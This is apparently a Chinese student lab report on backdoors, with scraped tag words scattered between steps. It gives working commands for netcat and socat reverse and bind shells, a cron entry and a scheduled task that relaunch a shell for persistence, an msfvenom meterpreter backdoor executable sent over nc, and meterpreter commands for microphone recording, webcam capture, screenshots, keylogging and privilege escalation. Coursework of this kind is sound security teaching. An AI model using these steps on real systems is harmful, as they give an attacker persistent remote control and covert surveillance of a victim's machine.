20155206 Exp2 後門原理與實踐

20155206 Exp2 後門原理與實踐

1.Windows得到Linux Shell

  • 在windows下,打開CMD,使用ipconfig指令查看本機IP
    linux

  • 而後使用ncat.exe程序,ncat.exe -l -p 5206監聽本機的5206端口web

  • 在kali端,使用nc指令的-e選項,nc 192.168.56.1(主機ip) 5206(所設置的端口) -e /bin/sh反向鏈接Windows主機的5206端口:
    shell

  • 隨後在windows端,就可使用kali的命令行了
    vim

2.Linux得到Windows Shell

  • 過程與以前的相似,先在Kali環境下用ifconfig查看IP

  • 使用nc指令,nc -l -p 5206,監聽5206端口
    windows

  • 而後,在windows,輸入ncat.exe -e cmd.exe 192.168.92.168 5206
    tcp

  • 而後,在kali端,就可使用windows的cmd了
    工具

3.使用netcat獲取主機操做Shell,cron啓動

  • 先在Windows系統下,用ncat.exe -l -p 5206,監聽5206端口測試

  • crontab -e指令編輯一條定時任務(輸入3,選vim.basic)ui

  • 在最後一行加入43 * * * * /bin/netcat 192.168.56.1 5206 -e /bin/sh,意思是在每一個小時的第30分鐘(爲測試結果方便所選時間最好離現實時間較近)反向鏈接Windows主機的5220端口,就會啓動cron
    命令行

  • 到時間後,便得到了Kali的shell,能夠輸入指令

4.使用socat獲取主機操做Shell, 任務計劃啓動

  • 在Windows系統下,打開控制面板->管理工具->任務計劃程序(可在控制面板直接搜索任務計劃),建立任務,填寫任務名稱後,新建一個觸發器:

  • 下載安裝socat軟件
    在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5206 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5206,同時把cmd.exe的stderr重定向到stdout上;

  • 建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行,或者能夠右鍵單擊,而後選擇運行也能夠

  • 而後在Kali環境下輸入指令socat - tcp:192.168.1.101:5220,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5220端口,此時能夠發現已經成功得到了一個cmd shell

5. 使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  • 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.128 LPORT=5206 -f exe > 20155206.exe生成後門程序(LHOST=kali linux的IP)

  • 而後經過nc指令將生成的後門程序傳送到Windows主機上

windows:ncat.exe -l 5206 > 20155206.exe

kali:nc 192.168.56.1 5206 < 20155206.exe

  • 在Kali上使用msfconsole指令進入msf控制檯,set payload windows/meterpreter/reverse_tcp,使用監聽模塊,設置payload,設置反彈回連的IP和端口

  • 設置完成後,利用exploit,執行監聽,在windows中,利用20155206.exe運行20155206.exe

  • 此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell

6.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  • 使用record_mic指令能夠截獲一段音頻
  • 使用webcam_snap指令可使用攝像頭進行拍照
  • 可是,個人windows竟然沒有攝像頭。emmm,不對,是有攝像頭,但系統找不到

  • 使用webcam stream指令可使用攝像頭進行錄像
  • 使用screenshot指令能夠進行截屏
  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄
  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功

基礎問題回答

1.Meterpreter有哪些給你映像深入的功能?

  • 獲取目標主機攝像頭
  • 錄音
  • 主要是錄音,攝像頭這個問題看來是困擾不到我了
相關文章
相關標籤/搜索